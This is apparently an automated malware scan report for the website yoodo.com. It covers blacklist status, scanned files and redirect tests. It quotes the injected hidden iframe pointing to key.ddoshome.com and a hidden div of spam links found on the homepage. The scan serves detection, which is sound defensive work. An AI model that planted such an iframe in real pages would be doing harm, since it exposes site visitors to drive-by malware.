Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yoodo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.yoodo.com/ | 200 OK Content-Length: 43277 Content-Type: text/html | malicious |
Page code contains blacklisted domain: key.ddoshome.com <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1></iframe><script type="javascript" src="ps.js"></script></div><h1><h1><div style="display:none">
<td></a><a href="http://518zplm.com/" target="_blank">��������˽��</a></td> <td></a><a href="http://www.518zplm.com/" target="_blank">����˽��</a></td> </ ...[4476 bytes skipped]... Malicious iFrame found. size: 123x1 src: http://key.ddoshome.com:21999/index.htm This URL is marked by Google as suspicious <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1> | ||
http://www.yoodo.com/ps.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://www.yoodo.com/test404page.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://www.yoodo.com/jquery1.6.js | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 16:51:24 GMT Accept-Ranges: bytes ETag: "09741403b26cf1:fe5" Server: IIS Content-Length: 91342 Content-Location: http://www.yoodo.com/jquery1.6.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Feb 2014 08:36:54 GMT X-Powered-By: WAF/2.0 | clean |
http://www.yoodo.com/js/jquery.min.js | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 16:51:27 GMT Accept-Ranges: bytes ETag: "06727223a26cf1:fe5" Server: IIS Content-Length: 91342 Content-Location: http://www.yoodo.com/js/jquery.min.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Feb 2014 08:28:54 GMT X-Powered-By: WAF/2.0 | clean |
http://www.yoodo.com/js/jquery.blueberry.js | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 16:51:30 GMT Accept-Ranges: bytes ETag: "06727223a26cf1:fe5" Server: IIS Content-Length: 4269 Content-Location: http://www.yoodo.com/js/jquery.blueberry.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Feb 2014 08:28:54 GMT X-Powered-By: WAF/2.0 | clean |
http://www.yoodo.com/js/menu.js | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 16:51:31 GMT Accept-Ranges: bytes ETag: "09458233a26cf1:fe5" Server: IIS Content-Length: 1285 Content-Location: http://www.yoodo.com/js/menu.js Content-Type: application/x-javascript Last-Modified: Mon, 10 Feb 2014 08:28:56 GMT X-Powered-By: WAF/2.0 | clean |
http://www.yoodo.com/lwqliuwan.kuai999.net/count.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://www.yoodo.com/lwqliuwan.kuai999.net/ | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yoodo.com
Result:
GET / HTTP/1.1
Host: yoodo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: yoodo.com
Referer: http://www.google.com/search?q=yoodo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yoodo.com
Referer: http://www.google.com/search?q=yoodo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.